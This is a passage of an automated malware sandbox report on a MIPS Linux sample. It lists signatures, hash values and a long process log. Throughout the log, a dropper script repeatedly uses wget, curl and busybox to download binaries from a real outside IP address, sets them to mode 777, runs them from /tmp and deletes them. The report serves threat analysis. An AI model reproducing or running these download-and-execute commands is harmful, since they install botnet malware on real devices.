/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/chmod
[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/rm
[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/usr/bin/wget
[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/chmod
[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/rm
[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/usr/bin/wget
[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/chmod
[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/rm
[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-20 03:36
Reported
2024-11-20 03:39
Platform
debian9-mipsel-20240611-en
Max time kernel
84s
Max time network
86s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | N/A |
| N/A | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | N/A |
| N/A | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | N/A |
| N/A | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | N/A |
| N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | N/A |
| N/A | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | N/A |
| N/A | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | N/A |
| N/A | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | N/A |
| N/A | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | N/A |
| N/A | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | N/A |
| N/A | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | N/A |
| N/A | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | N/A |
| N/A | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /usr/bin/curl | N/A |
Processes
/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh
[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/chmod
[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/rm
[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/wget
[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/chmod
[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/rm
[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/wget
[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/chmod
[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/rm
[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/usr/bin/wget
[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/chmod
[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/rm
[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/wget
[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/chmod
[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/rm
[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/wget
[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/chmod
[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/rm
[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/wget
[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/chmod
[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/rm
[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/wget
[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/chmod
[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/rm
[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/wget
[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/chmod
[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/rm
[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/chmod
[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/rm
[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/wget
[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/chmod
[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/rm
[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/wget
[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/chmod
[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/rm
[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/usr/bin/wget
[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/chmod
[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/rm
[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/usr/bin/wget
[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/chmod
[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/rm
[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |